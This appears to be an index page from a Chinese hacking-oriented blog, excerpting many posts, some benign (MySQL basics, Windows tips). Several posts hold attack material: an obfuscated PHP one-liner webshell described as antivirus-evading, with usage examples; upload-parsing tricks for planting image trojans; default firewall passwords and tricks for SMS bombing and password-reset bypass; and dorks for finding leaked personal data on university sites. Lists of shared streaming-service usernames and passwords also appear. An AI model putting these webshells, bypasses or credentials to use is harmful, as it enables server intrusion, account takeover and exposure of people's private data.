• 什么是Tor?Tor浏览器更新有什么用?什么是Tor?Tor浏览器更新有什么用?
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开
  • 中华人民共和国网络安全法中华人民共和国网络安全法
大横幅1
大横幅2
到期时间:永久 到期时间:推广
到期时间:推广 小横幅4
今日发布0 篇文章 | 本站共发布了2055篇文章
  • 图片木马

    利用图片和木马代码生成一个带木马的图片之后上传目标主机上之后,必须要以对应语言的方式执行木马才能上木马上线,只是打开图片链接是没有用的。 所以 图片木马执行的前提是目标主机有 相应的执行漏洞才行。 利用解析漏洞 一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 wooyun.asp,那么 /wooyun.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 第二种,在IIS6.0下,分号后面的不被解析,也就是说 wooyun.asp;.jpg 会被服务器看成是wooyun.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种 /wooyun.asa /wooyun.cer /wooyun.cdx 二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的… 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为 ');?> 的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php 三、Nginx <8.03 空字节代码执行漏洞 影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 Nginx在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php 来执行其中的代码 四、Apache解析漏洞 Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断. 比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php. 如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀 五、其他 在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。 如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: SetHandler application/x-httpd-php 然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。 ...

    2019-10-04 1354
  • 后台登陆页面的渗透思路

    万能密码/弱口令 先拿'or'='or'试一下,再试一下弱口令 遇到网络设备,基本像交换机、路由器、安全设备之类的,可以尝试一下默认密码 天融信防火墙,不需要证书 登录地址:https://192.168.1.254 用户名:superman 密码:talent 技术支持热线:8008105119 天融信防火墙,不需要证书 登录地址:https://192.168.1.254:8080 用户名:superman 密码:talent!23 遇到设备需要把旧设备配置备份下来,再倒入新设备基于console口登陆,用户名,密码跟web界面一致 system config reset 清除配置 save 保存 联想网御防火墙,需要证书(最好用IE浏览器登录) 登录地址:https://10.1.5.254:8889 用户名:admin 密码:leadsec@7766、administrator、bane@7766 技术支持热线:4008107766 010-56632666深信服防火墙(注安全设备管理地址不是唯一的) https://10.251.251.251https://10.254.254.254 用户名:admin 密码:admin 技术支持热线:4006306430 启明星辰 https://10.1.5.254:8889 用户名:admin 密码:bane@7766https://10.50.10.45:8889 用户名:admin 密码:admin@123 电脑端IP:10.50.10.44/255.255.255.0 技术支持热线:4006243900 juniper 登录地址:https://192.168.1.1 用户名:netscreen 密码:netscreen Cisco 登录地址:https://192.168.0.1 用户名:admin 密码:cisco Huawei 登录地址:http://192.168.0.1 用户名:admin 密码:Admin@123 H3C 登录地址:http://192.168.0.1 用户名:admin 密码:admin 技术支持热线:4006306430 绿盟IPS https://192.168.1.101 用户名: weboper 密码: weboper 配置重启生效网神防火墙GE1口 https://10.50.10.45 用户名:admin 密码:firewall 技术支持热线:4006108220 深信服VPN: 51111端口 delanrecover 华为VPN:账号:root 密码:mduadmin 华为防火墙: admin Admin@123 eudemon eudemon Juniper防火墙: netscreen netscreen 迪普 192.168.0.1 默认的用户名和密码(admin/admin_default) 山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone 安恒的明御防火墙 admin/adminadmin 某堡垒机 shterm/shterm 天融信的vpn test/123456 使用burp弱口令爆破 使用Burp里的Intruder功能进行爆破,如何使用请看:如何使用FOFA挖到弱口令漏洞 扫目录 目录扫描也是一个存在惊喜的地方,说不定能扫描到后台未授权访问的链接、备份文件、编辑器、敏感信息等。 像后台登陆的网址看多了,常规的路径像www.xxx.com/admin/login.aspx(.php)老司机甚至不用御剑什么的工具跑,就能直接猜到。 一般碰到下面这种情况,可采用fuzz大法。一层一层fuzz,尝试寻找可利用的信息。 框架漏洞 1. 对一些CMS,已经比较成熟了,漏洞确实不好挖。如果网上(乌云,seebug,搜索引擎等)的历史漏洞没有复现成功,那一般情况下就只能寻找下逻辑漏洞、网站管理员配置错误或者弱口令什么的。 2. 对于一些不知名的框架,一般也可通过登陆界面底下的声明中找到开发公司和产品版本时间。 3. 在网上找找此公司产品是否爆出过漏洞。若是开源的框架,还可下载源码进行代码审计寻找漏洞。像java的站,登陆页面是.do或.action的网址。可尝试下 struts2 命令执行漏洞。 4. 又如thinkphp的CMS,可尝试下是否存在相应版本的命令执行漏洞。 逻辑漏洞 任意用户注册 注册用户不需验证码认证即可注册成功的情况下,可使用工具发包,恶意批量注册用户。 修改发送包邮箱尝试覆盖注册 1. 注册时显示某用户已注册; 2. 在注册新用户时抓包,更改自己的账号信息为admin用户; 3. 可能可以覆盖admin用户,重新注册成功。 任意密码重置 修改密码时使用其他人的手机号,可抓包更改成自己的手机号。自己手机收到验证信息并输入,可更改他人密码成功。 跳过验证 跳过验证步骤、找回方式,直接到设置新密码页面 短信轰炸 短信轰炸,一般人可能抓包重放失败后就放弃了。这里有个技巧 发送短信处一般每隔60秒才能发送一次 但若是发包时在手机号后加上一个空格、加号或换行符等特殊字符。然后重新发送,这时若发送成功,则说明可绕过限制。 此时在intruder模块只要持续递增空格就可造成无限短信轰炸 越权 越权访问目录 可越权访问到后台路径,网站组件配置文件,备份文件等,当然扫目录字典也要好。 修改身份标识 更改成功登陆的用户的身份标识,可能就能越权访问到其他用户的页面。 抓返回包 在登陆时返回包可能返回用户敏感信息,此时改一改参数说不定还能越权查到其他用户信息。 或注册、找回密码发送短信邮箱时,可能直接返回验证码等 在返回包里,更改下参数为true、success、1,可能就能未授权进入后台 看网站源码信息 当你思路枯竭的时候不妨看看源码,它是一块宝藏,说不定就能在里面发现惊喜。有些程序员会把后台的功能链接放在前端源码中,说不定就存在未授权访问,甚至有些奇葩程序员在前端代码存放测试的账号密码。 声明: 作者的初衷是分享与普及网络安全知识,若读者因此做出任何违法行为,后果自负,与原作者无关。 ...

    2019-10-04 1589
  • 在线生成自己的军装照片

    当兵后悔两年,不当兵后悔一辈子。 没有穿上军装体验到军营生活成了一种遗憾, 生成一张军装照减少一丝遗憾吧 地址:https://ih101.weishi.qq.com/main.html ...

    2019-10-04 984
  • 如何挖掘高校信息泄露漏洞?

    先看看我的"战绩"一)信息泄露漏洞的定义: 敏感数据包括但不限于:口令、密钥、证书、会话标识、License、隐私数据(如短消息的内容)、授权凭据、个人数据(如姓名、住址、电话等)等,在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。 高校的信息泄露漏洞,是普遍存在的,而且比较严重,我接触到,低危的是身份证泄露,手机号泄露;高危的有密级是秘密的,管理员账号密码的。 我个人猜测漏洞存在的原因: 一般老师互传是有渠道的,老师与学生互传才没有渠道,因此需要借助站点,例如发公众号,推文。 为什么不用内网?因为大多数人用手机看。 二)如何操作? 1.使用Google Hacking Google Hacking语法是个神器,我把他比喻成一把神剑,能斩到什么,就看你怎么用。 site:edu.cn 搜索所有主域名是edu.cn的链接 filetype:xls 搜索所有文件后缀是xls的链接 懂了一些没有?你还可以给他添加你想要的条件 site:edu.cn filetype:xls 手机号 (三个条件:搜索所有主域名是edu.cn的链接,并且文件后缀是xls的,也就是xls文件,并且搜索xls文件内容带有手机号的链接。) 我已经把思路教给你们了,至于怎么深入利用,还得自己移驾到百度搜索:Google Hacking语法 如果有看不懂这盘文章的,请你逐字逐句把第二步慢慢读一遍。 三)闻道 道阻且长,没有特殊的机缘,知道也只是知道,许多人到死都不会明白一切是怎么回事。 声明: 作者的初衷是分享与普及网络安全知识,若读者因此做出任何违法行为,后果自负,与原作者无关。 ...

    2019-10-04 1536
  • 腾讯视频会员账号共享

    我们保证每天分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:17315692 密码:gfWIDmL4yQgi 账号:648156921 密码:Z7rTFk 账号:6591569211 密码:EgWqGim 账号:3231569205 密码:wV5T9Rl6b 账号:55015692 密码:OBl1Ad13FgW 账号:1581569202 密码:Dq02SCOhuLctyIr 账号:23715692086 密码:gcgNIDnaD 账号:32615692 密码:oxzHuYZLJ 账号:94815692 密码:KhPahr4VIBX 账号:91156920624 密码:buRXiHZe9tRQ 账号:316156921191 密码:wTsV72dDBVg 账号:2851569204841 密码:kedekciUrnm2H ...

    2019-10-04 946
  • 迅雷超级白金账号分享

    我们保证分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:5601569031 密码:bTL9dtqII 账号:762156903 密码:iAkzleAmCajw 账号:651156903 密码:znwTSzwGZO8N3 账号:2971569037735 密码:7mG1NUF4EFcxJbd 账号:61615690354 密码:FSxXgx2qfPg4 账号:1671569037 密码:NHrZPc 账号:675156904 密码:DlNq3IBdqGPrZr 账号:941569034208 密码:TgxVEr8mqD3 账号:3491569033377 密码:kSAXFd 账号:884156903334 密码:1vqng5Ps2y 账号:992156904 密码:O80zDXnJ 账号:580156903 密码:90Uzxq7 账号:520156903969 密码:gBLIzP0gXEY 账号:40115690332 密码:FUBErBKxGId0kA4 温馨提示:给大家分享这么多账号,也希望大家能够向你的朋友分享本站,浏览器搜索【kirin博客】即可访问本站 ...

    2019-10-04 886
  • 爱奇艺会员账号分享

     我们保证分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:1021569037 密码:p4wE9VnFp4gx 账号:1321569038 密码:R9583wHEYnWAPFG 账号:668156903 密码:rYibpWqrQS 账号:9111569040 密码:ivjCJRG 账号:4391569033998 密码:1BFcSbAhR9 账号:30515690418 密码:2D8fVJMmQRP2 账号:827156903 密码:rjITvmLa 账号:49515690361 密码:L8zxcuK7mO 账号:71915690 密码:wi7Idj4tw3TnF 温馨提示:给大家分享这么多账号,也希望大家能够向你的朋友分享本站,浏览器搜索【Kirin博客】 ...

    2019-09-14 862
  • mysql的基本用法

    安装 rpm安装 yum install -y mysql-server mysql-devel 启动服务 1.service mysqld start #启动服务 2.service mysqld stop #关闭服务 3.service mysqld restart #重启服务 4.chkconfig mysqld on #设置开机启动 常用操作 mysql客户端命令 mysql -u #用户名 -p #密码 -h #主机 -p #协议(根据tcp, socket, pile等) 更改用户密码 mysqladmin实现 1.mysqladmin -uroot password 'newpassword' -p 或 2.mysqladmin -u root -h hostname password 'newpassword' 修改数据库实现 1. mysql>use mysql; mysql>update user set password = password('newpassword') where user = 'root'; mysql>flush privileges; 2. mysql>set password for 'root@host_name' = password('newpassword'); mysql>update mysql.user set password = password('newpassword') where condition; mysql>flush privileges; 服务端常用命令 交互模式(通过mysql -uroot -p进入) mysql>show databases; #列出所有数据库 mysql>shwo tables; #查看所有表 mysql>show engines; #查看引擎信息 mysql>show character set; #查看字符集 mysql>use DB_NAME; #切换当前数据库 查看数据库当前有访问权限的信息 mysql>use mysql; mysql>select User, Password, Host FROM user; 允许用户远程登陆 mysql>use mysql; mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; mysql>flush privileges; #其中"*.*"代表所有资源所有权限, “'root'@%”其中root代表账户名,%代表所有的访问地址, #也可以使用一个唯一的地址进行替换,只有一个地址能够访问。如果是某个网段的可以使用地址 #与%结合的方式,如10.0.42.%。IDENTIFIED BY 'root',这个root是指访问密码。WITH GRANT OPTION允许级联授权。 删除历史输入的命令 root@localhost# head ~/.mysql_history root@localhost# >~/.mysql_history 批处理模式(用于将表导入数据库) mysql < *.sql 数据库的备份 root@localhost# mysqldump -uroot -p password [DB_NAME] > [DUMP_FILE] #备份指定数据库 root@localhost# mysqldump --no-data --databases mydatabases1 mydatabases2 mydatabases3 > test.dump #只备份表结构 root@localhost# mysqldump --all-databases > [DUMP_FILE] #备份所有数据库 忘记root密码 #跳过访问控制权限进入mysql #编辑 /etc/my.cnf,添加一行:skip-grant-table [mysqld] skip-frant-table #重启mysqld service mysqld restart #修改密码 root@localhost# mysql mysql>use mysql mysql>update mysql.user set password = password('newpassword') where user = 'root' and host = 'localhost'; mysql>flush privileges; mysql>exit #编辑/etc/my.cnf文件 删除skip-grant-table #重启服务 service mysqld restart 创建用户 #登陆mysql mysql -uroot -p密码 #创建用户 mysql> insert into mysql.user(Host,User,Password) values("localhost","test",password("1234")); #创建了一个test用户 密码为1234 且只能本地登陆如果要远程登陆把"localhost"改为"%"。 mysql>flush privileges; 删除用户 #登陆mysql mysql -uroot -p密码 #删除用户 mysql>Delete FROM user Where User='test' and Host='localhost'; mysql>flush privileges; mysql>drop database testDB; #删除用户的数据库 #删除账户及权限 mysql>drop user 用户名@'%'; mysql>drop user 用户名@ localhost; 删除数据库和数据表 mysql>drop database 数据库名; mysql>drop table 数据表名; 导入导出.sql文件的方法 #导出数据和表结构: mysqldump -u用户名 -p密码 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p abc > abc.sql #只导出表结构 mysqldump -u用户名 -p密码 -d 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p -d abc > abc.sql #导入数据库 1.建立空数据库 mysql>create database abc; 2.导入数据库 1).选择数据库 mysql>use abc; 2).设置数据库编码 mysql>set names utf8; 3).导入数据库(注意sql文件路径) mysql>source /root/abc.sql...

    2019-09-13 933
  • Win10任务管理器监控系统在桌面上显示

    让Win10实时监控任务管理器在桌面上面显示或置顶在最前面让你时时刻刻了解你的电脑资源占用率,还可以在玩游戏时测测是否资源率占用大,还有各种姿势使用,自己折腾吧。 打开任务管理器,键盘快捷键:CTRL+SHIFT+ESC,默认显示是下图一样的打开性能然后双击CPU那里。 双击就变成这种简洁窗口了,再次双击就还原,其它功能自己尝试吧! ...

    2019-09-13 1071
  • 最新webshell免杀php一句话变种

    前言       2019年9月9日最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> 说明 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码...

    2019-09-13 1637
  • PHP腾讯域名拦截检测接口源码

    <?php header('Access-Control-Allow-Origin:*'); header('Content-type:application/json; charset=utf-8'); error_reporting(0); !empty($_GET['url']) ? $url = $_GET['url'] : exit(json_encode([ 'code'=>-1, "msg"=>"请输入网址" ],JSON_UNESCAPED_UNICODE)); $json = jsonp_decode(Curl_GET("https://cgi.urlsec.qq.com/index.php?m=check&a=check&callback=jQuery11.306943167371763181_15671.3944271&url={$url}&_=".msectime())); if ($json->reCode!==0){ $arr=[ "code"=>-1, "msg"=>$json->data, ]; }else{ $type = $json->data->results->whitetype; $urls = $json->data->results->url; if ($type==1 || $type==3){ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"正常" ]; }else{ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"拦截" ]; } } exit(json_encode($arr,JSON_UNESCAPED_UNICODE)); /** * @return string * Curl GET */ function Curl_GET($url){ $ch = curl_init(); // Curl 初始化 $header = [ 'X-FORWARDED-FOR:218.91.92.84', 'CLIENT-IP:218.91.92.84', 'Cookie: pgv_pvi=9897416704; RK=WI7w5+CMZn; ptcz=e383433090496e1f60381fd68733196426868ba1876249a6736bcc4a3eb8ec72; pgv_pvid=455855220; cid=89410138-a33a-4ea9-98f2-4436da89d67d; _tfpdata=yBRknXvS8CfrED0zD85NZfxCPzT5SW8KEY03rIziZmu9ogk9y%2B5%2FU4QrJBbfqfuVqr%2F6vw8nSWfqHR3fu2Jc0TPvszwmrMwXEdN%2B8bKKfHwNCcL%2F2%2Fbhmiu%2B%2F4IgK1DX' ]; curl_setopt($ch, CURLOPT_URL, $url); // 设置 Curl 目标 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Curl 请求有返回的值 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); // 设置抓取超时时间 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 跟踪重定向 curl_setopt($ch, CURLOPT_ENCODING, ""); // 设置编码 curl_setopt($ch, CURLOPT_REFERER, $url); // 伪造来源网址 curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //伪造IP curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"); // 伪造ua curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); // 取消gzip压缩 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $content = curl_exec($ch); curl_close($ch); // 结束 Curl return $content; // 函数返回内容 } /** * 返回当前毫秒 */ function msectime() { list($msec, $sec) = explode(' ', microtime()); return (float)sprintf('%.0f', (floatval($msec) + floatval($sec)) * 1000); } /** * @param $jsonp * @param bool $assoc * @return mixed * jsonp转对象 */ function jsonp_decode($jsonp, $assoc = false) { $jsonp = trim($jsonp); if(isset($jsonp[0]) && $jsonp[0] !== '[' && $jsonp[0] !== '{') { $begin = strpos($jsonp, '('); if(false !== $begin) { $end = strrpos($jsonp, ')'); if(false !== $end) { $jsonp = substr($jsonp, $begin + 1, $end - $begin - 1); } } } return json_decode($jsonp, $assoc); } ...

    2019-09-13 1436
  • PHP自动Get监控源码分享

    程序简介 创建个PHP文件放到你的网站根目录里面,访问后不会出现结果,等待个20秒左右关闭页面,就会自动执行了。 如果不重启php服务器 或者重启服务器,get监控一直会处于运行状态。 测试了一下秒赞网的监控,效果还是很不错的。 程序代码 <?php //设置脚本运行不超时 set_time_limit(0); //即使浏览器关闭还继续运营 ignore_user_abort(true); //睡眠5秒 sleep(5); //要监控的网址 $cronurl = 'https://www.baidu.com/'; //开始get监控 httpGet($cronurl); //这里还可以无限添加httpGet("网址"); //获取当前文件的访问url $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; //开始get运行,达到无限循环的效果 httpGet($url); //发起GET模拟请求 function httpGet($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept-Encoding: gzip, deflate')); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 3); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $output = curl_exec($ch); curl_close($ch); return $output; } ...

    2019-09-13 968
  • 拥有一副好身材是怎样的体验?

    知乎上关于身材好的讨论层出不穷,备好营养快线在看 拥有一副令人羡慕的好身材是怎样的体验? 地址:https://www.zhihu.com/question/297715922/answer/730392675 身材丰满型的女生穿旗袍不好看吗? 地址:https://www.zhihu.com/question/293990901/answer/728222816 有个身材火辣的女朋友是怎样一种体验? 地址:https://www.zhihu.com/question/313825759/answer/633963251 女生拥有一双大长腿是什么样体验? 地址:https://www.zhihu.com/question/266669308/answer/386636616 为啥现在腿控那么多? 地址:https://www.zhihu.com/question/305040147/answer/575079312 ...

    2019-09-06 861
  • QQ扩列宣言女生可爱撩人签名 我这个该死的漂亮女孩

    导读:你骂我,我吃亏,你就是个小乌龟今天要完成的任务是,想你,爱你,夸你。抬头要挺胸,走路要带风。我这个该死的漂亮女孩。你的眼睛真漂亮里面只适合装我你过来我有个天想跟你聊一下算命的说我旺夫你要不要验证一下说 你骂我,我吃亏,你就是个小乌龟 今天要完成的任务是,想你,爱你,夸你。 抬头要挺胸,走路要带风。 我这个该死的漂亮女孩。 你的眼睛真漂亮里面只适合装我 你过来 我有个天想跟你聊一下 算命的说我旺夫你要不要验证一下 说了晚安就不准再和别的小朋友聊天了哦。 猪圈空荡荡,而你在人间。 抱着小熊一天天长大 糖果也一天天甜. 都怪这个世界上女孩子太多了 我都不宝贝了 你好,我叫对象,真名老婆,小名女神,外号宝贝,喜欢哪个就叫我哪个。 女生污起来,男生用十个闪现都追不上。 我妈说等我长大了,就把我嫁给你。 你现在在哪儿 在家 你现在在我的脑海里 你知道我喜欢什么季节吗 不知道 我喜欢有你的季节 染最艳的头发 留最深的疤 只为寻找最爱的她 我想你一定很忙,所以你只看前三个字就好。 想打你一顿,也想抱抱你,想问你怎么还不来找我,我难过的都要发芽了。 遇见这么可爱的我,难道不是这世间最好的礼物吗? 我有一点点甜 一点点可爱 还有很多很多喜欢你. 没时间跟你斤斤计较,我还要忙着可爱。 希望你以后,有酒有肉有姑娘,姑娘丑的不像样。 我曾经是少女 现在是美少女. 世间的五味俱全 只想要一个人给的甜. 冬天啊 女孩子白白嫩嫩的手就应该放在喜欢的人口袋里. 见什么世面 见见你就好啦 小鱼干是我的 你也是我的 要记住每一个对你好的人,因为他们本可以不这么做的。 都说爱笑的人智商高那我岂不是智商爆表了. 你是个好男孩,可是我太漂亮了,你配不上。 现在的我很自在,皆因没有恋爱。 别拍了,我就是这儿最沙最甜的西瓜。 小时候被不吐西瓜子吓的半死的,长大就知道自己多蠢了吧。 ...

    2019-08-29 903
  • 腾讯BUG免费换挂件

    无需开通会员点击即可直接设置挂件 已亲测! 地址:http://t.cn/Ai83eWSH...

    2019-08-29 913
  • 王者荣耀体验服

    王者荣耀体验服最新一期资格申请活动 开放时间8月27日15点开启抢号功能! 地址:http://t.cn/Ai8fLbQI...

    2019-08-27 1259
  • 干货|Python渗透测试工具库

    漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://github.com/RandomStorm/DVWA 数据库注入练习平台 : https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat: https://github.com/cr0hn/vulnerable-node Ruby编写的一款工具,生成含漏洞的虚拟机: https://github.com/cliffe/secgen 花式扫描器 : Nmap端口扫描器: https://github.com/nmap/nmap 本地网络扫描器: https://github.com/SkyLined/LocalNetworkScanner 子域名扫描器: https://github.com/lijiejie/subDomainsBrute https://github.com/aboul3la/Sublist3r https://github.com/TheRook/subbrute https://github.com/infosec-au/altdns linux漏洞扫描: https://github.com/future-architect/vuls 基于端口扫描以及关联CVE: https://github.com/m0nad/HellRaiser 漏洞路由扫描器: https://github.com/jh00nbr/Routerhunter-2.0 迷你批量信息泄漏扫描脚本: https://github.com/lijiejie/BBScan Waf类型检测工具: https://github.com/EnableSecurity/wafw00f 服务器端口弱口令扫描器: https://github.com/wilson9x1/fenghuangscanner_v3 Fox-scan扫描器: https://github.com/fengxuangit/Fox-scan/ 信息搜集工具 : 社工收集器: https://github.com/n0tr00t/Sreg Github信息搜集: https://github.com/sea-god/gitscan github Repo信息搜集工具: https://github.com/metac0rtex/GitHarvester 信息探测及扫描工具: https://github.com/darryllane/Bluto 内部网络信息扫描器: https://github.com/sowish/LNScan 远程桌面登录扫描器: https://github.com/linuz/Sticky-Keys-Slayer 网络基础设施渗透工具 https://github.com/SECFORCE/sparta SNMAP密码破解: https://github.com/SECFORCE/SNMP-Brute WEB: webshell大合集: https://github.com/tennc/webshell 渗透以及web攻击脚本: https://github.com/brianwrf/hackUtils web渗透小工具大合集: https://github.com/rootphantomer/hacktoolsfor_me XSS数据接收平台: https://github.com/firesunCN/BlueLotus_X55Receiver XSS与CSRF工具: https://github.com/evilcos/xssor xss多功能扫描器: https://github.com/shawarkhanethicalhacker/BruteXSS web漏洞扫描器: https://github.com/andresriancho/w3af WEB漏洞扫描器: https://github.com/sullo/nikto 渗透常用小工具包: https://github.com/leonteale/pentestpackage web目录扫描器: https://github.com/maurosoria/dirsearch web向命令注入检测工具: https://github.com/stasinopoulos/commix 自动化SQL注入检查工具: https://github.com/epinna/tplmap SSL扫描器: https://github.com/rbsec/sslscan 安全工具集合: https://github.com/codejanus/ToolSuite apache日志分析器: https://github.com/mthbernardes/ARTLAS php代码审计工具: https://github.com/pwnsdx/BadCode web指纹识别扫描: https://github.com/urbanadventurer/whatweb 检查网站恶意攻击: https://github.com/ciscocsirt/malspider wordprees漏洞扫描器: https://github.com/wpscanteam/wpscan 固件漏洞扫描器: https://github.com/misterch0c/firminator_backend 数据库注入工具 https://github.com/sqlmapproject/sqlmap Web代理: https://github.com/zt2/sqli-hunter 新版中国菜刀: https://github.com/Chora10/Cknife git泄露利用EXP: https://github.com/lijiejie/GitHack 浏览器攻击框架: https://github.com/beefproject/beef 自动化绕过WAF脚本: https://github.com/khalilbijjou/WAFNinja https://github.com/owtf/wafbypasser 一款开源WAF: https://github.com/SpiderLabs/ModSecurity http命令行客户端: https://github.com/jkbrzt/httpie 浏览器调试利器: https://github.com/firebug/firebug DISCUZ漏洞扫描器: https://github.com/code-scan/dzscan 自动化代码审计工具 https://github.com/wufeifei/cobra 浏览器攻击框架: https://github.com/julienbedard/browsersploit tomcat自动后门部署: https://github.com/mgeeky/tomcatWarDeployer 网络空间指纹扫描器: https://github.com/nanshihui/Scan-T burpsuit之J2EE扫描插件: https://github.com/ilmila/J2EEScan windows域渗透工具: mimikatz明文注入: https://github.com/gentilkiwi/mimikatz Powershell渗透库合集: https://github.com/PowerShellMafia/PowerSploit Powershell tools合集: https://github.com/clymb3r/PowerShell powershell的mimikittenz: https://github.com/putterpanda/mimikittenz 域渗透教程: https://github.com/l3m0n/pentest_study Fuzz: Web向Fuzz工具 https://github.com/xmendez/wfuzz HTTP暴力破解,撞库攻击脚本 https://github.com/lijiejie/htpwdScan 漏洞利用及攻击框架: msf框架: https://github.com/rapid7/metasploit-framework pocsscan攻击框架: https://github.com/erevus-cn/pocscan Pocsuite攻击框架: https://github.com/knownsec/Pocsuite Beebeeto攻击框架: https://github.com/n0tr00t/Beebeeto-framework 漏洞POC&EXP: ExploitDB官方git版本: https://github.com/offensive-security/exploit-database php漏洞代码分析: https://github.com/80vul/phpcodz CVE-2016-2107: https://github.com/FiloSottile/CVE-2016-2107 CVE-2015-7547 POC: https://github.com/fjserna/CVE-2015-7547 JAVA反序列化POC生成工具: https://github.com/frohoff/ysoserial JAVA反序列化EXP: https://github.com/foxglovesec/JavaUnserializeExploits Jenkins CommonCollections EXP: https://github.com/CaledoniaProject/jenkins-cli-exploit CVE-2015-2426 EXP (windows内核提权): https://github.com/vlad902/hacking-team-windows-kernel-lpe use docker to show web attack(php本地文件包含结合phpinfo getshell 以及55Rf结合curl的利用演示): https://github.com/hxer/vulnapp php7缓存覆写漏洞Demo及相关工具: https://github.com/GoSecure/php7-opcache-override XcodeGhost木马样本: https://github.com/XcodeGhostSource/XcodeGhost 中间人攻击及钓鱼 中间人攻击框架: https://github.com/secretsquirrel/the-backdoor-factory https://github.com/secretsquirrel/BDFProxy https://github.com/byt3bl33d3r/MITMf Inject code, jam wifi, and spy on wifi users: https://github.com/DanMcInerney/LANs.py 中间人代理工具: https://github.com/intrepidusgroup/mallory wifi钓鱼: https://github.com/sophron/wifiphisher 密码破解: 密码破解工具: https://github.com/shinnok/johnny 本地存储的各类密码提取利器: https://github.com/AlessandroZ/LaZagne 二进制及代码分析工具: 二进制分析工具 https://github.com/devttys0/binwalk 系统扫描器 https://github.com/quarkslab/binmap rp: https://github.com/0vercl0k/rp Windows Exploit Development工具 https://github.com/lillypad/badger 二进制静态分析工具(python): https://github.com/bdcht/amoco Python Exploit Development Assistance for GDB: https://github.com/longld/peda 对BillGates Linux Botnet系木马活动的监控工具 https://github.com/ValdikSS/billgates-botnet-tracker 木马配置参数提取工具: https://github.com/kevthehermit/RATDecoders Shellphish编写的二进制分析工具(CTF向): https://github.com/angr/angr 针对python的静态代码分析工具: https://github.com/yinwang0/pysonar2 一个自动化的脚本(shell)分析工具,用来给出警告和建议: https://github.com/koalaman/shellcheck 基于AST变换的简易Javascript反混淆辅助工具: https://github.com/ChiChou/etacsufbo EXP编写框架及工具: 二进制EXP编写工具: 